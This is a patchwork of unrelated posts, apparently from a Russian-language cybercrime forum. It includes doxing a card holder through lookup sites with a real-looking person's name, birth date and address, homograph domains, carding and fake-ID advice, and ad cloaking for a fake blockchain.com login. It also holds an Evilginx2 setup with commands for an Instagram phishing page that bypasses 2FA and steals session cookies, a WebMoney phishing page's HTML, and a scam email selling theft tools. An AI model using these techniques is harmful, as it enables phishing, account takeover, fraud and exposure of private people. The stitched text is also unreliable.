2. Вводим известные нам данные:

Так как нам известно имя/фамилия холдера, а узнать нам нужно данные его/ее матери, нас интересуют только поля:

- Family Member

(выбираем ""Child" и вводим имя/фамилию холдера)

- Gender

(выбираем "Female", т.к. нас интересует мать холдера)

- Collection Priority

(выбираем страну, можно оставить без изменений для поиска по всей базе)

Ну и соответственно жмем "Search"

3. Видим результаты поиска

4. Найдя нужного человека, нажимаем "See All information" или на истроку с наименованием и получаем искомый результат

Иногда поиски затягиваются или не приносят должного результата,

но при должном подходе все затраты времени и сил окупятся с лихвой.
Пробив холдера авто USA

Данные которые использовались в статье:
TIFFANI G MOENCH
DOB: 09/25/70
845 CHELSIE DRIVE, KAYSVILLE, UT 84037

Итак начнем!
Заходим на сайт: https://www.geico.com/
вводим ZIP и нажимаем GET A QUOTE:

Далее вводим имя фамилию адрес и доб и жмем NEXT:

И на следующей странице мы видим машины(отображаются не всегда) на данные которые вбили:

Юзайте клоаку для адв.

Для удобства я возьму хостинг www.namecheap.com дешево быстро и фришный ссл независимо от клауда, который при репорте убьет ваш домен. Таблица с символами уже не доступна, но для вас я ее сохранил.
Для примера возьму домен www.winminer.com

Открывает таблицу и видим символ в Icelandic алфавите í

Spoiler: img

копируем и заменяем в нашем домене, получаем так: www.wí nminer.com

Spoiler: img

В процессе оформления на этой странице выбираем язык символа:

Spoiler: img

/SPOILER]

Таблица:

Таблица:

Where does IDN apply | Speednames

web.archive.org

You must have at least 77 reaction(s) to view the content.

ищу партнера.с аками даной плошадки

Подскажите актуальные шопы cc, и если есть инвайт буду благодарен. Можно в пм.

Всем привет!
Вы уже наверно слышали про сайт Honeygain.com

​

Spoiler: Что такое Honeygain.com

Вот гугловский перевод.

Что такое Honeygain?
Honeygain - это краудсорсинговая сетевая компания,
которая позволяет другим компаниям проводить аналитические, рыночные и бизнес- исследования.

Что делает приложение Honeygain?
Это безопасно? Приложение предоставляет прокси-сервисы третьим лицам, таким как специалисты по данным,
Fortune 500 и другие заслуживающие доверия компании. Это безопасно? Да! Ваша безопасность важна для нас.
И поскольку пчелиная матка знает своих пчел, мы знаем, для чего каждый партнер использует свою сеть.

Безопасны ли мои персональные данные с Honeygain?
100%. Мы не храним никаких данных наших клиентов. Единственные данные, которые мы будем иметь, это то,
что будет необходимо для сервиса. Это включает в себя ваш адрес электронной почты, ваш IP-адрес,
сколько трафика вы делаете в месяц и выбранные вами способы выплаты.

Как рассчитывается мой платеж?
Вы зарабатываете кредиты за каждый введенный вами килобайт данных, и,
собрав достаточное количество кредитов, вы можете конвертировать их в доллары США.

How credits convert to USD?
10 credits are equal to 0.01USD (1 cent USD)

Каковы ваши лучшие места?
У нас нет лучших мест - у Honeygain есть покрытие по всему миру.

Есть ли приложение для Windows?
Да! Мы запустили приложение для Windows! Теперь вы можете Honeygain
на вашем рабочем столе! Получи это здесь

Работает ли Honeygain на Wi-Fi и мобильных данных?
Да, Honeygain работает как на Wi-Fi, так и на мобильных данных.
Мобильные данные должны быть включены в настройках приложения.

Какова минимальная выплата?
Минимальная выплата составляет 20 долларов США.

Какова текущая ставка выплат?
Вы получаете 1 кредит за 10 МБ трафика, проходящего через вас. Таким образом, за 10 ГБ вы заработаете 1 доллар США.

Какие способы выплат доступны в настоящее время?
В настоящее время мы поддерживаем платежи через PayPal, но скоро появятся новые возможности!

Есть ли способ увеличить мой заработок?
Все просто - установите Honeygain на большее количество устройств и подключите устройство к сети (работа, дядя или ваш дом).
Это поможет вам максимально увеличить ваши потенциальные выплаты. (Лучше всего, когда уникальный IP-адрес имеет не более 3 устройств)

На каких сетях работает Honeygain? Что означает ошибка «Сеть недоступна»?
Honeygain поддерживает только ваши домашние и мобильные сети (IP-адреса). Если вы подключены к сети другого типа (IP-адрес),
вы увидите следующую ошибку «Сеть неработоспособна», и приложение будет остановлено, пока вы не подключитесь к соответствующей сети.

На скольких устройствах я могу использовать Honeygain? Что означает ошибка «Перегрузка сети»?
Вы можете использовать до 3-х устройств в одной сети (IP-адрес) одновременно, но чтобы получить максимальный доход,
у вас должно быть 1 устройство на IP-адрес. Дополнительные устройства, подключенные к этой сети,
будут приостановлены и будут отображать ошибку «Network Overused» до тех пор, пока не уменьшится количество активных устройств.
В целом, мы не ограничиваем количество устройств, подключенных к вашей учетной записи - если вы хотите использовать 100 устройств,
вы можете, но вы должны подключить их как минимум к 20 различным сетям (по 3 устройства в каждой).

Сколько данных использует Honeygain?
Вы можете рассчитывать на использование до 2 ГБ в день, хотя учтите, что в зависимости от скорости вашей сети мы можем достичь максимум 15 ГБ в день.

Могу ли я защитить себя от использования всего моего тарифного плана?
Да. Вы можете сделать это, просто отключив использование мобильных данных в меню настроек приложения Honeygain.
Или, если в Windows - щелкните правой кнопкой мыши значок Honeygain bee и выберите «выйти», чтобы выключить приложение.

Могу ли я установить предупреждение о том, сколько данных я использую?
Если вы используете версию нашего приложения для Android, мы рекомендуем использовать уведомления об использовании данных Android.
Что касается пользователей Windows, в настоящее время мы работаем над решением.

Могут ли мои кредиты истечь?
Обычно нет. Если вы активный пользователь, срок действия ваших кредитов не истечет.
Однако срок действия кредитов Honeygain истекает через 6 месяцев после того дня, когда вы были активны в последний раз.

Как я могу связаться с вами?
Не стесняйтесь обращаться к нам через контактную форму нашего сайта!

У вас есть реферальная программа?
Да! Вы можете пригласить своих друзей с помощью персонализированной ссылки, и 10% их ежедневного заработка будет добавлено на ваш счет!

Как долго мне нужно ждать выплаты?
Продолжительность выплаты зависит от выбранного вами типа оплаты и вашего местоположения.
Для платежей PayPal они должны быть обработаны в течение 24 часов.

Могу ли я использовать Honeygain, если я несовершеннолетний?
Законный возраст зрелости зависит от страны, в которой вы живете, поэтому мы советуем вам убедиться, что это такое.
Если вы несовершеннолетний, вам может потребоваться разрешение ваших родителей или опекунов на использование Honeygain.

Как узнать, что приложение работает?
Если вы используете Android, вы увидите небольшое зеленое уведомление на панели уведомлений.
В Windows просто наведите курсор мыши на маленький значок пчелы на панели уведомлений.

Будет ли работать Honeygain, если я использую VPN?
Нет, мы не поддерживаем IP-адреса сетей VPN или Datacenter.

Что произойдет, если я выключу свой Wi-Fi или Wi-Fi будет недоступен?
Приложение автоматически остановится и будет ждать, пока оно не сможет снова подключиться к сети.

Будет ли использование сети Honeygain мешать моему повседневному использованию данных?
Вы не должны чувствовать никакой разницы с нашим приложением, работающим в фоновом режиме.
Мы настроили наше приложение так, чтобы оно никогда не использовало более 10% доступной пропускной способности сети.

Использует ли приложение больше батареи?
Да, пока активно разделение трафика, приложение использует батарею устройства.
В зависимости от возраста вашего устройства ожидаемое потребление может варьироваться от 5% до 8% батареи в день.

​

​

Honeygain ставим на дедик и получаем $. Сайт использует твой интернет как прокси. За это платит в $ на ПайПал. По реферальной ссылке дают 5$ на счёт, без реферальной будешь зарабатывать с нуля, как я. Я нашёл прогу на серваке, ну и зарегался. другу кинул свою реферальную ему дали 5$.
Реферальная: тык
Не реферальная: тык

Начнем зарабатывать немного кэша,а не 10 центов в день как у других получается

1. Регистрируемся на сайте
Реферальная: тык - 5 $ получите сразу на свой счет в личном кабинете,для вывода останется накопить 15 $
Не реферальная: тык

2.Скачиваете официальный софт с сайта Honeygain скачать

3.Скачиваем бот+ исходники в архиве [CLIKE]

You must have at least 2 reaction(s) to view the content.

[/CLIKE]

4.После того как все скачали,устанавливаем софт из пункт 2
Путь установки не меняем,обычно путь такой C:\Users\Имя вашего пользователя\AppData\Roaming\Honeygain\
если программа при запуске пишет

типо не поддерживаемая сеть или
если программа работает то оставляем работать,если нет то читаем далее,на многих дедиках у меня эта
софтина не хотела работать,продолжим

5.Выходим из Honeygain приложения, и запускаем бот из Honeygain Bot Free.exe из папки Honeygain Bot Free
либо компилируете сами,исходники также прикладываю в архиве
бот выглядит так

6.Переходим в личный кабинет https://dashboard.honeygain.com/
кликаете правой кнопкой мыши в любом месте и нажимаете "Просмотреть код" или Ctrl+Shift+I

7.Нажимаем вкладку Network (1)
(2)balance
(3) Headers
и листаем вниз до надписи authorization:

выделяем все после двоеточия
authorization:
все что ниже выделяете у себя
пример:

8.Копируем все выше выделенное(это ваш токен авторизации) и вставляем сюда

Line token оставить пустым
**Tread **больше 2 не ставить(количество одновременно запущенных копий программ) на официальном сайте написано
что больше 3 устройств на одном ip адресе снижают скорость и заработок тоже соответственно
Delay оставьте по умолчанию 300
Autorun(автозапуск бота) можете включить по желанию
Limit (количество переданных гигабайт) ставьте любым,естественно чем больше тем лучше

ну и после очень ~~сложных~~ простых настроек нажимаем
курим 5 секунд,и можете запускать нажатием кнопки Start нашу уже пропатченную софтину ,она запустится автоматически,в трее появится иконка пчелки
мой пример как выглядит так, у вас здесь будет по 0 ,вы же только начали работать

далее окно для ввода вашей почты и пароля который вы указывали при регистрации
их вводить сюда

нажимаем логин,софт работает,минуты через 2 проверяем количество баллов и количество переданых мегабайт,если пусто, ждем,не факт что ip вашей страны будет востребован сразу,но он будет поверьте!

В дальнейшем можно запускать софт и без бота,программа уже пропатченна,у программы находящиеся в папке \AppData\Roaming\Honeygain\ снизится вес,это нормально не пугайтесь.
Можно сделать портабл версию,копируете папку Honeygain отсюда \AppData\Roaming\Honeygain\ и можете запускать на других ПК,файл HoneygainUpdater лучше удалить,ибо программа будет постоянно проверять обновления и если обновится,то весь патчинг слетит и придется делать все заново!

P.S
Из моих личных наблюдений скажу сразу,страны азиатского контингента менее востребованы чем Европа или USA,
лично на одном из дедиков с немецким ip, у меня за один день прошло трафика 15 гигов,хороший спрос естественно на такие страны как Америка,Канада,Великобритания,Германия,Франция,Италия,Испания,но это не значит что не надо пробовать другие страны,что касается нашей необъятной страны России,то в день максимум был спрос 3-5 гигов,иногда и вообще 200-300 Mb . Заметил странное снижение трафика перед набором минималки в 20 баксов,но после выплаты все снова стало зае..сь!
Выплата приходит в течении 1-2 дней,бывало и через 5 часов

Минималку на выплату я набирал по разному ,бывало и за 3-4 дня , бывало и 1-2 недели
Количество постоянно работающих дедиков в 15-30 штук приносят примерно около 3-4 баксов в день,еще раз повторюсь зависит все от ip страны дедика и от количества пропускной способности(желательно 1ГБ но и со 100 Mb тоже пойдет)

На своем домашнем ПК или телефоне с андроидом(для ios приложения нет) можете смело ставить программу,по вирустоталу файл чистый,ip за все время моего использования в черные базы не попал,все таки они дорожат своей репутацией ибо потеряют клиентов!

Немножко пруфов

Надеюсь объяснил подробно,все удачного заработка!И не верьте в бред которые пишут люди про заработок 4 цента в сутки!
Всем здоровья и удачи!

So I’m a professional Spammer and have a lot of experience in BEC . Im creating this thread to talk about anything related to bec . Anyone feel free to ask any question I will answer being the most blunt possible.

слитый курс от wwh

You must have at least 5 message(s) to view the content.

MY ENGLISH IS PURE CHAOS SO FORGIVE ME THAT,WARNING AFTER READING YOU CAN BE MORE CONFUSED NOT FROM INFORMATIONS BUT FROM MY CUSTOM ENGLISH,
MADE BY BACKSTAB,EVERYTHING IS WRITTEN BY MYSELF,NOTHING ON THIS POST i NOT COPY/PASTE FROM ANOTHER SOURCE,ENJOY

because people share knowledge and users help each other so I want too bring something useful to community and its be just my experience and knowledge
please don't expect any methods I just want update some information what you could find in guides

also I am not expert there I just want help and share my experience
i know we cannot share together working methods because its be fast burned but i think people must have valid information from which can learn so lets go start
----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
Carding is not same like vendors,scammers present to You
a lot information what you could find on clear net or even on other forums is outdated
----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
1. EASY/SIMPLE BASIC INFORMATION

Few example what I found on outdated or even forums,guides

-use Firefox and extension ( for example to load PayPal account with cookies )
that's was probably work few years ago but now its anti-fraud system more better and extension could be detected
anyways Mozilla Firefox have high Spyware level so I think its not safe like people say

-use Virtual Machine
again that's was probably work few years ago but now its can be again detected ( check attach file to proof my information )
**also its you can setup VM to not be detected but that 's nobody cannot know when people don't tell you that **
_also maybe a lot people don 't know how dangerous is Mozilla Firefox ( check attach file to proof my information )
you can easily solved use arkenfox **(https://github.com/arkenfox/user.js )

**_

I can continue more because there is many things but I don 't want waste your time and I just want proof my information
**don 't forget check attachment **

----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
I remember times when people on Carding groups on Telegram don't care about security and OpSec everyone want just fast money but nobody want learn
so let me tell you few basic problem with carding and payments what people have
----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
1 - CARD IS DEAD
2 - BAD PROXY
3 - BAD SETTING/SETUP
----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
_1 - CAN BE EASILY SOLVED OVER VERIFIED CHECKER FOR CARDS
2 - ITS MORE COMPLICATED FOR THIS REASON CHECK _( check attach file to proof my information )
a) You must always check anti-fraud score under 0-20 is okay that was you see on screenshot its bad and never works for payment
b) DNS LEAK MUST MATCH WITH ISP
EXAMPLE : COMCAST CABLE ( SOCKS5 ) MUST HAVE COMCAST CABLE ( DNS ) THAT'S CORRECT
COMCAST CABLE ( SOCKS5 ) HAVE GOOGLE OR ANOTHER DNS IS WRONG AND AGAIN NEVER WORK PROPERLY FOR PAYMENTS

3 - ITS MOST COMPLICATED AND ITS BE VERY HARD FOR ME DESCRIBE AND EXPLAIN WHAT I CURRENT MEAN

Now i don't want immediately jump how properly setup your device but I want write my theory with some examples ( some information can be repeated )

- like i said its most complicated thing and for me its hard describe in this post but let me start from begin
when i was start with carding i was read guides where vendors write "use Firefox and use extension" now we know its bad because its can be detected

**for example do you know what is device fingerprints or even browser fingerprints/canvas fingerprints
do you know webGL could detect your GPU ? **
_do you know TCP/IP could detect your real OS ? ( so when spoofing from Linux to Windows over some anti-detect browser TCP/IP could be problem )

i am pretty sure some things you don't know before that you read this and don't worry its not reason to be shamed,
this problematic about browser I be explain more and when you have over 20 reactions on your account you can check it _

- many people tell you use RDP and there can be again some problem because many vendors sell VM RDP and that 's real problem
be honest i know how its be flustered why payments not work and you just read again outdated guides and think what you was doing wrong

now be honest and buy physical RDP can be for many us problem and expensive as hell,so for this reason I was start from begin and that was download Linux and try hack owns RDP
because my theory is carders want fast and easy money but they don't start from begin but somewhere from middle

simple who hack RDP ( hackers ) vendors just sell they
_who phish cards ( phishers ) and again vendors many times don 't have any idea how use they just sell _

so I think its perfect and fine to download some Linux and start from begin and try hack own RDP or even get some experience about phishing

now another example many scammers sell method+bin but let me tell you secret and that's every site is cardable You need always just non-vbv bin
but also I want say its can be true and some sites is more hard to card than others

now my personal experience when I was bought gift cards
on sites egifter,dundle I maked purchase 50$ Steam gift card and after I try bought another they want DL FRONT+BACK ( maybe selfie ) what must match with victim on card and for that i was not ready

so that's another problem You was come to do carding and you never think about ( like make digital DL over photoshop and PSD templates )
and be honest that's fucking hell because every state in USA have different PSD template and different PDF417 barcode

Yes i know its better ways how cash out card but everyone tell you buy gift cards or even crypto ( its same difficult )
simple to say I recommend to use android phone rooted,custom rom and etc

**- FLASH TWRP
- CUSTOM ROM WITHOUT GAPPS
- FLASH MAGISK
- MOST IMPORTANT IS USE XPOSED MODULES

2. EXAMPLE OF CARDING/ BASIC INFORMATION **

You must have at least 10 reaction(s) to view the content.

1. https://www.getcopper.com/ - карта как greenlight, для тинейджеров, можно линкануть и ба и карту, депать с них деньги. Можно так же создать ребенка и слать ему.

2. https://sentpaid.com/ - paypal инвойсы, неординарный подход ?

3. https://www.northone.com/ - бизнес банк, что с ним делать, поймут только те, кто работает с регистрацией ллсишек и так далее.

Как и обещал.
Привет славпох с 2016

Подготовка арсенала.
Первое что вам нужно, это клоака. Это некий фильтр от ботов и модераторов. Как это работает: Если модератор зашел на ваш ленд который вы клоачите, то ему покажет white.html и тем самым он не попадет на ваш фейк и даст апрув по линку. Так же есть гео фильтр, тут думаю все понятно.

Очень важный момент, что бы апрув РК прошел по маслу, пишите прокладку aka white.html с нуля! Это может быть поставка паленых колонок jbl партиями через тайланд в школу на день учителя.
Если вашу РК отклонили или акк ушел в бан, берите новый домен и пишите новую прокладку!

Нам понадобится 2 домена:
1-й домен для прокладки aka white.html
2-й домен для вашего фейк\ленда ( в моем случаи в пример взят https: // login . blockchain . com /#/login )

white page / вп / белая страница / прокладка - это страница которая будет показываться модераторам или ботам.
offer page / блек пейдж - это страница, на которую будет кидать юзеров.

Я рекомендую взять >ТУТ< тестовый период на 7 дней для начала. Для примера возьму линк https: // login . blockchain . com /#/login

Spoiler: Настройка с иллюстрациями

Все, ваша клоака настроена и готова к бою! Начнем все загружать.

Загружаем.
1. Берем первый домен и хост офк который мы и будет сувать в рекламный кабинет,он же и есть клоака.

Spoiler: Файлы white.html + клоака. Клоака index.php

Грузим это все на ваш первый домен и все готово, желаю удачи в начинаниях.

p.s к сожалению не смогу часто отвечать на ваши вопросы в связи с личными проблемами.

Usus est optimus magister (лат. Опыт - лучший учитель)
В этой теме делимся негативным опытом обитания в сети. негативный опыт тоже опыт и каждого из нас хоть раз да обманывали и пытались вытрясти деньги.
Вообщем все когда то были ламаками и верили что "наш ICQ цветок станет синим".
Я тоже отосплюсь и расскажу набор своих историй из личного опыта.

Думаю тема будет полезна тем, кто до сих пор попадается на все это дело.
Вообщем поехали.

Не давно в сети появился новый способ развода - по внутренней почте wm keeper'a.
По внутреней почте приходит сообщение такого рода:

Code:Copy to clipboard

Поздравляем, вы выиграли в акции "Двойной баланс"! 
С 2006г. по 2007г. каждый месяц Webmoney Transfer проводит различные акции. По ст.5.1 п.10 о соглашении Webmoney Transfer, компьютер случайным образом выбирает один WMID, который и станет победителем в той или иной акции.
В данном случае компьютер выбрал ваш WMID и вы стали призером акции "Двойной баланс".
Вы можете удвоить свои титульные знаки на любом из WMZ, WMR или WME 
кошельке.

Для этого вам нужно:
Выбрать (см. внизу) один из вариантов, который вам больше подходит
В открывшемся окне ввести сумму, которую вы хотите удвоить (сумма должна быть не более, чем сумма на выбранном вами кошельке с учетом комиссии 0.8%)
Нажать продолжить


 
Выберите, какие титульные знаки хотите удвоить:
1. Умножить WMZ в 2 раза
2. Умножить WMR в 2 раза
3. Умножить WMU в 2 раза
4. Умножить WME в 2 раза 

Примечание:
* баланс удваивается моментально.
* Удвоить можно только 1 раз.

Скриншот|Screenshot

HTML код данной страницы выглядит так:

Code:Copy to clipboard

<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=windows-1251">
<style>
A {
        COLOR: #1f4790; FONT-FAMILY: verdana, helvetica, sans-serif; TEXT-DECORATION: none
}
A:hover {
        COLOR: #1f4790; FONT-FAMILY: verdana, helvetica, sans-serif; TEXT-DECORATION: underline
}
</style>
</head>
<body bgColor="#ffffff" leftMargin="3" topMargin="0" marginheight="0" marginwidth="0">
<table cellSpacing="0" cellPadding="0">
 <tr>
  <td>
   <A href="http://www.webmoney.ru/" target="_blank"><IMG height="80" hspace="10" src="http://www.webmoney.ru/img/logo_wm.gif" width="170" border="0"></A>
  </td>
 </tr>
 <tr>
  <td align="center">
   <font style="font-family: verdana, arial, helvetica, sans serif; color:#1f4790; font-size:13px;"><b>Поздравляем, вы выиграли в акции "Двойной баланс"!</b></font>
  </td>
 </tr>
 <tr>
  <td align="justify"><font style="font-family: verdana, arial, helvetica, sans serif; color:#444444; font-size:12px;">
   С 2006г. по 2007г. каждый месяц Webmoney Transfer проводит различные акции.
   По ст.5.1 п.10 о соглашении Webmoney Transfer, компьютер случайным образом выбирает один WMID, который и станет победителем в той или иной акции.
   
В данном случае компьютер выбрал ваш WMID и вы стали призером акции "Двойной баланс".
   
Вы можете удвоить свои титульные знаки на любом из WMZ, WMR или WME кошельке.
   

Для этого вам нужно:
   <li>Выбрать (см. внизу) один из вариантов, который вам больше подходит
   <li>В открывшемся окне ввести сумму, которую вы хотите удвоить (сумма должна быть не более, чем сумма на выбранном вами кошельке с учетом комиссии 0.8%)
   <li>Нажать продолжить
   


   </font>
  </td>
 </tr>
 <tr>
  <td><font style="font-family: verdana, arial, helvetica, sans serif; color:#444444; font-size:12px;">
   Выберите, какие титульные знаки хотите удвоить:

1. <a href="wmkayto?Purse=Z653442206739&Desc=Умножение WMZx2&BringToFront=Y">Умножить WMZ в 2 раза</a>

2. <a href="wmkayto?Purse=R425160807968&Desc=Умножение WMRx2&BringToFront=Y">Умножить WMR в 2 раза</a>

3. <a href="wmkayto?Purse=U365215950008&Desc=Умножение WMUx2&BringToFront=Y">Умножить WMU в 2 раза</a>

4. <a href="wmkayto?Purse=E473564454543&Desc=Умножение WMEx2&BringToFront=Y">Умножить WME в 2 раза</a>
   </font>
  </td>
 </tr>
 <tr>
  <td><font style="font-family: verdana, arial, helvetica, sans serif; color:#444444; font-size:10px;">
   
Примечание:
   
* баланс удваивается моментально.
   
* Удвоить можно только 1 раз.
   </font>
  </td>
 </tr>
</table>
</body>
</html>

Спам идёт с разных WMID поэтому засечь конкретный WMID мошеника нельзя
Подробнее в Арбитраже...

фейки:*

• AOL
• eBay
• PayPal
• PNC-Bank
• US Bank ASP

Spoiler: 15

_http://rapidshare.de/files/12415158/scams_loc.rar.html

Spoiler: 20

пасс: locator

---
*-Fake(фейк) в переводе с английского-подделка,обман.
---
ТОлько для ознакомления.

You must have at least 250 reaction(s) to view the content.

Вопросы задавать сюда
На самом WWH:

Полная стоимость 60.000 рублей.
Обязательно иметь на материал 200 USD.(12.000)

Click to expand...

Click to expand...

Тема будет дополняться в период до конца обучения
Запрещено сливать хайд на форумы

Click to expand...

В архиве 2 папки - eth and btc. Используйте что хотите.

You must have at least 30 message(s) to view the content.

Evilginx2 - тула для фишинга от kgretzky. Киллер фича - это возможность забайпасить 2-fa. Для пользователя страница выглядит абсолютно идентично оригинальной, так как по факту это оригинальная страница и есть. Весь код страницы проксируется через nginx, а прокси подменяет все урлы которые есть в теле ответа, на урлы контролируемого домена, за счет чего все кнопки работают корректно, но редиректят на наш сервер.

Первая версия Evilginx была тоже хороша https://github.com/kgretzky/evilginx, но недостатками была сложность установки и конфигурирования, в результате сейчас проект не поддерживается, и многие конфиги не работают, хотя только на первой версии проекта у меня получалось допилить applied конфиг до рабочей версии, могу выпустить отдельный пост про это.

Прелесть второй версии в том, что все работает в докере, что убирает весь геморрой с конфигурированием, и оставляет нам править простецкий yml файлик

Список поддержвиаемых сервисов для фишинга, из коробки, впечатляет:

И так в посте покажу процес установки и разворачивания:

• Покупаем домен и vps
• Настраиваем ns запись на свою VPS (Может занят до суток)

Установка:

Code:Copy to clipboard

curl https://get.docker.com/ | bash
git clone https://github.com/kgretzky/evilginx2
cd evilginx2
docker build . -t evilginx2
docker run -it -p 53:53/udp -p 80:80 -p 443:443 evilginx2

Интерактивный шелл который открылся умеет help. С этого момента можно выбрать любой из сервисов, я покажу на примере instagram:

Code:Copy to clipboard

config domain example.org # подставить свое
config ip 10.0.0.23 # подставить свое
phishlets hostname instagram insta2.exmaple.org # подставить свое
phishlets enable instagram
lures create instagram
lures get-url 0
https://www.insta2.example.org/oEnQzLHb

По ссылке для фишинга(https://www.insta2.example.org/oEnQzLHb) полная копия оригинального instagram с возможностью авторизации 2fa.

Каждый ввод ввод данных генерит сессию, с любой из сессий можно забрать куки, и воспользоваться ими для входа в сервис.

-----Original Message-----
From: WM Admin wmz-admin@list.ru
To: olka111@mail.ru
Date: Wed, 18 Oct 2006 20:05:42 +0400
Subject: Здравствуйте уважаемые пользователи Интернета!

Здравствуйте уважаемые пользователи Интернета!

webmoneygenerators.by.ru -на этом сайте вы можете купить последнюю версию генератора электронных денег в платежной системе WebMoney.ru , также на сайте есть реквизиты для связи с нами!

Вам предлагаются программы для получения прибыли из международной платёжной системы WebMoney Transfer, которые способны обмануть, всем известный, WM Keeper. Если вы сейчас откажитесь, больше такой возможности не будет!

Приобретая программу, Вы получаете:

1. Надёжный и стабильный источник дохода.

2. Уверенность в себе и своём завтрашнем дне.

3. Вы навсегда сможете оставить работу в офисе или на предприятии и станете зарабатывать у себя дома, сидя за компьютером.

4. Вам придётся работать всего 5-30 минут в сутки (в зависимости от вашей собственной заинтересованности).

5. Вы будете в состоянии удовлетворить любую свою потребность, т.к. не будете испытывать стеснения в финансах.

6. Ваше пребывание в сети будет приносить вам немалые деньги.

Итак, что же это за программы:

WebMoneyGenerator 7.6

Новая суперэффективная программа для достижения на 100% гарантированных успехов в электронном заработке, даже если у Вас нет ни опыта, ни сайта, ни продукта для продаж... Последнее слово в технологиях получения денег при помощи сети Интернет! Вам не потребуется никаких дополнительных вложений, достаточно просто приобрести программу и Вы СРАЗУ ЖЕ сможете приступить к получению денег из Сети. НЕ ВКЛАДЫВАЯ ДОПОЛНИТЕЛЬНО НИ КОПЕЙКИ!!! На сегодняшний день одна из совсем немногих программ (единственная среди работающих), я бы сказал уникальная в своём роде, реально работающая и приносящая большую и регулярную прибыль своему владельцу, способная используя небольшие недоработки в клиентской части ПО международной платёжной системы WebMoney Transfer.

Принцип действия программы уникально прост. Дело в том, что для увеличения денежных средств на вашем WM кошельке вам не нужно больше воровать деньги у другого пользователя, пытаться украсть ключ идентификатор, или пароль к системе, достаточно воспользоваться программой Web Money Generator и просто увеличивать ежедневно ваш капитал на любую сумму. Данная программа создаёт виртуального (т.е. не существующего) отправителя, который отсылает вам эти деньги с автоматически сгенерированного Web Money Generator кошелька. Первые версии программы позволяли зарабатывать, таким образом, не более 10 WMZ в день, но, начиная с версии 2.0 улучшена система генерации, которая, теперь, позволяет использовать вашу программу неоднократно в день и получать до 1000 WMZ в сутки (больше просто не советую, т.к. такое обилие идентичных транзакций в сутки может вызвать подозрение у администрации сайта WebMoney и ваш счёт может быть заблокирован).Сайт программы webmoneygenerator.by.ru

Интерфейс данной программы очень понятен, и всё, что от Вас требуется, это запустить программу параллельно с WMKeeper и указать в ней сумму, тип и номер Вашего кошелька соответствующий данной валюте в системе WebMoney, на который и будут перечисляться деньги, другие необходимые данные программа считывает из памяти WMKeeper.

Стоимость этой программы составляет 50 WMZ. Я не могу продавать программу дешевле, в противном случае ей начнут пользоваться слишком много людей, а это чревато снижением её производительности и необоснованным риском. Это последняя версия генератора вышла 19 сентября. Продаваться будет до конца октября 2006 года, после продаж не будет! Скоро цена подымится до 100 WMZ.

WebMoney CARD

Существует множество способов пополнить свой кошелёк: банковский перевод, наличными в обменном пункте, и пр.

Сейчас нас интересует пополнение кошельков с помощью WM-карт. Активируете ее, и Ваш кошелёк уже пополнен. Смысл работы предлагаемой программы заключается в том, что номинал WM-карты несложным алгоритмом зашифрован в номере карты и в коде активации, после ввода этих значений в соответствующие поля программы, простым пересчётом она генерирует номер и код карты большего номинала. Из 10 - 20, из 20 - 50, из 50 - 100. Но не забывайте об осторожности, дело это не совсем законное, если не сказать, совсем.

Стоимость программы 30 WMZ. Сами понимаете, программа стоит того, окупится сразу.

Webmoney Keeper MOD

Предназначена для похищения денег с чужих кошельков. Представляет собой пакет, состоящий из двух изменённых файлов: Webmoney.exe и WMclient.dll. Работает с WMKeeper 2.2.0.6 - 2.4.0.0. Вам просто следует заменить существующие у Вас на компьютере файлы на новые, модификация заработает.

Для удобства в WMKeeper добавлена новая кнопка. Нажав которую откроется меню: ВЗЛОМ - здесь нужно указать любой известный вам кошелёк, чтобы узнать есть ли на нём деньги и в каком количестве; А также меню Сканирование кошельков" - это Сканирование диапазона кошельков на наличие, на каком то из них денег. После окончания сканирования программа выдаёт отчет, который можно сохранить в файл. Для того чтобы извлечь деньги с чужого кошелька нужно нажать кнопку "HACK" и указать, сколько Вы хотите.

Огромный плюс в том, что при этом Вас невозможно вычислить, т.к. перевод с чужого кошелька в самом чужом кошельке в историю операций не записывается.

Стоимость пакета 100 WMZ. Это уже совсем незаконная работа с реальными деньгами. Если у вас нет таких денег вы можете купить WebMoneyGenerator 7.6 и сгенерировать их.

Webmoney Keeper Patch

Представляет из себя патч, который вносит некоторые изменения в WebMoney Keeper.

Он позволяет переводить любое количество денег имеющихся у вас в кошельке на любой другой кошелёк. При этом все деньги остаются у Вас на счету. Если вы отправите их с протекцией сделки, то они к вам вернуться через заданное время, и ваш счёт пополниться.

Стоимость патча 1000 WMZ. Это стоит того, что вам больше не придётся думать о том, сколько вы потратили. Если у вас нет таких денег вы можете купить WebMoneyGenerator 7.6 и сгенерировать их.

Если у Вас появились вопросы или вы хотите приобрести какую-либо программу пишите на: admins-wm@inbox.ru.
Пишите только на этот адрес!

Оплата производиться в системе WebMoney.

Помните, что Вы, как покупатель, несёте полную ответственность за приобретённые программы!

Гарантии и риски:

К сожалению, ввиду специфичности, предоставляемых мною услуг, я не могу гарантировать Вам тот или иной уровень дохода, только Вы сами, на основе, изложенной в этом письме информации, можете сделать выводы о работоспособности и результативности предлагаемых программ. Также Вам следует соблюдать осторожность и конфиденциальность при пользовании ими.

Приобретя программу, Вы получите:

1. Конечно, саму программу и полные инструкции в эксплуатации и мер безопасности
2. Вам будет дан пароль и адрес сайта, на котором вы можете всегда прочитать инструкции, статьи и пообщаться на форуме (где обсуждается совместные сделки, захваты и успехи)...

Кроме этого, Вы получаете:

1. Надежный и стабильный источник дохода!
2. Уверенность в себе и своем завтрашнем дне!
3. Вы даже сможете оставить работу в офисе или на предприятии и станете зарабатывать у себя дома, сидя только за компьютером!
4. Вам придется лишь несколько раз в день подключаться к Интернету - этого вполне достаточно для генерации!
5. Вы будете в состоянии удовлетворить любую свою прихоть, так как не будете испытывать стеснения в финансах!
7. Ваше пребывание в Сети будет приносить Вам немалые ДЕНЬГИ!!!

Вы никогда не задумывались, почему одни люди извлекают из Интернета тысячи и десятки тысяч долларов в месяц, не особенно себя, утруждая, тогда как другие не в состоянии заработать пары долларов, несмотря на все их титанические усилия? Все очень просто! Преуспевающие люди владеют определенными программами, знают особые секреты и особые технологии, которых не знают остальные!!! Знание в данном случае не просто сила. Знание в данном случае ДЕНЬГИ!!! В прямом смысле этого слова.

